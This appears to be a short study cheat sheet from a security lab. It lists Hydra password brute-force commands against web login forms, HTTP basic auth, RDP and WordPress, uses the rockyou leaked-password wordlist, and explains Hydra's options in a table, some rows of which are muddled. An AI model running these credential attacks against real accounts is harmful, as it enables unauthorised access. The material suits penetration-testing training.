hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
|Command|Description|
|-------|-----------|
|hydra -P <wordlist> -v <ip> <protocol>|Brute force against a protocol of your choice|
|hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>|Attack a Windows Remote Desktop with a password list.|
|hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'|Craft a more specific request for Hydra to brute force.|
|Option|Decription| |------|----------| |-l|Single username| |-P|Indicates use the following wordlist| |http-post-form|indicates the method| |/login url|the login URL| |:username|the form field where the username is entered| |^USER^|tells Hydra to use the username from -l| |password|the formfield where the password is entered| |^PASS^|tells Hydra to use the wordlist from -P| |Login|indicates to Hydra the login failed message| |Login failed|is the login failure message that the form returns| |F=incorrect|If this word appears on the page, login failed| |-V| verbose|
Social_engineering